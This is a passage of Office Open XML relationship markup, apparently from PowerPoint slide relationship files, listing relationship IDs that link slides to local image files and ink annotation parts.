Target="../media/image1410.png"/><Relationship Id="rId373" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink607.xml"/><Relationship Id="rId394" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image950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70.png"/><Relationship Id="rId233" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink536.xml"/><Relationship Id="rId254" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image880.png"/><Relationship Id="rId49" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink465.xml"/><Relationship Id="rId114" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image488.png"/><Relationship Id="rId275" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink557.xml"/><Relationship Id="rId296" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink568.xml"/><Relationship Id="rId300" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink570.xml"/><Relationship Id="rId135" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink486.xml"/><Relationship Id="rId156" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2510.png"/><Relationship Id="rId177" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink507.xml"/><Relationship Id="rId198" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image570.png"/><Relationship Id="rId321" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1212.png"/><Relationship Id="rId342" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image911.png"/><Relationship Id="rId363" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink602.xml"/><Relationship Id="rId384" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image901.png"/><Relationship Id="rId202" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image620.png"/><Relationship Id="rId223" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink531.xml"/><Relationship Id="rId244" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image830.png"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink455.xml"/><Relationship Id="rId265" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink552.xml"/><Relationship Id="rId286" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink563.xml"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink466.xml"/><Relationship Id="rId104" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image462.png"/><Relationship Id="rId125" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink481.xml"/><Relationship Id="rId146" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2011.png"/><Relationship Id="rId167" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink502.xml"/><Relationship Id="rId188" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3480.png"/><Relationship Id="rId311" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1160.png"/><Relationship Id="rId332" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image410.png"/><Relationship Id="rId353" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink597.xml"/><Relationship Id="rId374" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image851.png"/><Relationship Id="rId395" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink618.xml"/><Relationship Id="rId213" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink526.xml"/><Relationship Id="rId234" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image780.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink452.xml"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image458.png"/><Relationship Id="rId255" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink547.xml"/><Relationship Id="rId276" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink558.xml"/><Relationship Id="rId297" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1090.png"/><Relationship Id="rId40" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink456.xml"/><Relationship Id="rId115" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink476.xml"/><Relationship Id="rId136" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1511.png"/><Relationship Id="rId157" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink497.xml"/><Relationship Id="rId178" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3810.png"/><Relationship Id="rId301" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1112.png"/><Relationship Id="rId322" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink581.xml"/><Relationship Id="rId343" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink592.xml"/><Relationship Id="rId364" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2010.png"/><Relationship Id="rId199" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink519.xml"/><Relationship Id="rId203" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink521.xml"/><Relationship Id="rId385" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink613.xml"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image453.png"/><Relationship Id="rId224" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image730.png"/><Relationship Id="rId245" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink542.xml"/><Relationship Id="rId266" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image941.png"/><Relationship Id="rId287" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1040.png"/><Relationship Id="rId105" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink471.xml"/><Relationship Id="rId126" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1011.png"/><Relationship Id="rId147" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink492.xml"/><Relationship Id="rId168" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3110.png"/><Relationship Id="rId312" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink576.xml"/><Relationship Id="rId333" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink587.xml"/><Relationship Id="rId354" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1510.png"/><Relationship Id="rId51" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink467.xml"/><Relationship Id="rId189" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink514.xml"/><Relationship Id="rId375" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink608.xml"/><Relationship Id="rId396" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image96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6.xml"/><Relationship Id="rId112" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image487.png"/><Relationship Id="rId89" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image393.png"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image454.png"/><Relationship Id="rId133" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink642.xml"/><Relationship Id="rId138" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image610.png"/><Relationship Id="rId154" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1411.png"/><Relationship Id="rId159" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink656.xml"/><Relationship Id="rId175" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink664.xml"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2310.png"/><Relationship Id="rId170" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2211.png"/><Relationship Id="rId191" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink672.xml"/><Relationship Id="rId196" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3710.png"/><Relationship Id="rId200" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3910.png"/><Relationship Id="rId205" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink681.xml"/><Relationship Id="rId226" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1410.png"/><Relationship Id="rId247" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink704.xml"/><Relationship Id="rId107" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image462.png"/><Relationship Id="rId221" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink690.xml"/><Relationship Id="rId242" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink701.xml"/><Relationship Id="rId263" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink712.xml"/><Relationship Id="rId268" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image960.png"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image392.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image449.png"/><Relationship Id="rId123" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink632.xml"/><Relationship Id="rId128" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink637.xml"/><Relationship Id="rId144" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image910.png"/><Relationship Id="rId149" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink651.xml"/><Relationship Id="rId160" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1711.png"/><Relationship Id="rId165" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink659.xml"/><Relationship Id="rId181" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink667.xml"/><Relationship Id="rId186" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3010.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2940.png"/><Relationship Id="rId216" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image911.png"/><Relationship Id="rId237" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink698.xml"/><Relationship Id="rId211" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink685.xml"/><Relationship Id="rId232" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1710.png"/><Relationship Id="rId253" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink707.xml"/><Relationship Id="rId258" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image912.png"/><Relationship Id="rId113" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink623.xml"/><Relationship Id="rId118" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink627.xml"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image457.png"/><Relationship Id="rId134" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink643.xml"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image465.png"/><Relationship Id="rId139" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink646.xml"/><Relationship Id="rId64" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image490.png"/><Relationship Id="rId150" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1211.png"/><Relationship Id="rId155" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink654.xml"/><Relationship Id="rId171" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink662.xml"/><Relationship Id="rId176" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2510.png"/><Relationship Id="rId192" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3310.png"/><Relationship Id="rId197" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink675.xml"/><Relationship Id="rId206" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink682.xml"/><Relationship Id="rId227" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink693.xml"/><Relationship Id="rId201" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink677.xml"/><Relationship Id="rId222" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1210.png"/><Relationship Id="rId243" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink702.xml"/><Relationship Id="rId248" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image861.png"/><Relationship Id="rId264" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image940.png"/><Relationship Id="rId269" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink715.xml"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink622.xml"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image452.png"/><Relationship Id="rId124" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink633.xml"/><Relationship Id="rId129" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink638.xml"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image460.png"/><Relationship Id="rId91" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image394.png"/><Relationship Id="rId140" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image710.png"/><Relationship Id="rId145" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink649.xml"/><Relationship Id="rId161" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink657.xml"/><Relationship Id="rId166" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2011.png"/><Relationship Id="rId182" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2810.png"/><Relationship Id="rId187" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink670.xml"/><Relationship Id="rId217" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink688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711.png"/><Relationship Id="rId233" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink696.xml"/><Relationship Id="rId238" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2010.png"/><Relationship Id="rId254" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image891.png"/><Relationship Id="rId259" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink710.xml"/><Relationship Id="rId114" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image488.png"/><Relationship Id="rId119" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink628.xml"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image455.png"/><Relationship Id="rId270" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image970.png"/><Relationship Id="rId130" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink639.xml"/><Relationship Id="rId135" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink644.xml"/><Relationship Id="rId151" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink652.xml"/><Relationship Id="rId156" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1511.png"/><Relationship Id="rId177" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink665.xml"/><Relationship Id="rId198" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3810.png"/><Relationship Id="rId172" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2311.png"/><Relationship Id="rId193" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink673.xml"/><Relationship Id="rId202" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink678.xml"/><Relationship Id="rId207" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink683.xml"/><Relationship Id="rId223" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink691.xml"/><Relationship Id="rId228" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1510.png"/><Relationship Id="rId244" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image841.png"/><Relationship Id="rId249" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink705.xml"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image450.png"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image463.png"/><Relationship Id="rId260" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image921.png"/><Relationship Id="rId265" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink713.xml"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3410.png"/><Relationship Id="rId120" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink629.xml"/><Relationship Id="rId125" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink634.xml"/><Relationship Id="rId141" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink647.xml"/><Relationship Id="rId146" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1011.png"/><Relationship Id="rId167" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink660.xml"/><Relationship Id="rId188" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3110.png"/><Relationship Id="rId162" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1811.png"/><Relationship Id="rId183" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink668.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3390.png"/><Relationship Id="rId213" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink686.xml"/><Relationship Id="rId218" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1010.png"/><Relationship Id="rId234" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1810.png"/><Relationship Id="rId239" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink699.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink620.xml"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image458.png"/><Relationship Id="rId250" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image871.png"/><Relationship Id="rId255" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink708.xml"/><Relationship Id="rId271" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image395.png"/><Relationship Id="rId115" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink624.xml"/><Relationship Id="rId87" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3920.png"/><Relationship Id="rId131" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink640.xml"/><Relationship Id="rId136" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image511.png"/><Relationship Id="rId157" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink655.xml"/><Relationship Id="rId178" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2610.png"/><Relationship Id="rId45" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2210.png"/><Relationship Id="rId152" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1311.png"/><Relationship Id="rId173" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink663.xml"/><Relationship Id="rId194" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3610.png"/><Relationship Id="rId199" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink676.xml"/><Relationship Id="rId203" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink679.xml"/><Relationship Id="rId208" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image512.png"/><Relationship Id="rId229" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink694.xml"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image453.png"/><Relationship Id="rId224" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1310.png"/><Relationship Id="rId240" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2110.png"/><Relationship Id="rId245" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink703.xml"/><Relationship Id="rId261" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink711.xml"/><Relationship Id="rId266" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image950.png"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink621.xml"/><Relationship Id="rId126" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink635.xml"/><Relationship Id="rId105" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image461.png"/><Relationship Id="rId147" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink650.xml"/><Relationship Id="rId168" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2111.png"/><Relationship Id="rId121" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink630.xml"/><Relationship Id="rId142" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image811.png"/><Relationship Id="rId163" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink658.xml"/><Relationship Id="rId184" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2910.png"/><Relationship Id="rId189" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink671.xml"/><Relationship Id="rId219" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink689.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1100.png"/><Relationship Id="rId214" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image810.png"/><Relationship Id="rId230" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1610.png"/><Relationship Id="rId235" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink697.xml"/><Relationship Id="rId251" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink706.xml"/><Relationship Id="rId256" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image901.png"/><Relationship Id="rId116" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink625.xml"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image456.png"/><Relationship Id="rId137" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink645.xml"/><Relationship Id="rId158" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1611.png"/><Relationship Id="rId272" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink716.xml"/><Relationship Id="rId132" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink641.xml"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image464.png"/><Relationship Id="rId153" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink653.xml"/><Relationship Id="rId174" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2410.png"/><Relationship Id="rId179" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink666.xml"/><Relationship Id="rId195" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink674.xml"/><Relationship Id="rId62" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image480.png"/><Relationship Id="rId209" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink684.xml"/><Relationship Id="rId190" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3210.png"/><Relationship Id="rId204" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink680.xml"/><Relationship Id="rId220" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1110.png"/><Relationship Id="rId225" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink692.xml"/><Relationship Id="rId241" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink700.xml"/><Relationship Id="rId246" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image851.png"/><Relationship Id="rId267" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink714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27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink636.xml"/><Relationship Id="rId262" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image930.png"/><Relationship Id="rId122" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink631.xml"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image459.png"/><Relationship Id="rId143" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink648.xml"/><Relationship Id="rId148" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1111.png"/><Relationship Id="rId164" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1911.png"/><Relationship Id="rId169" 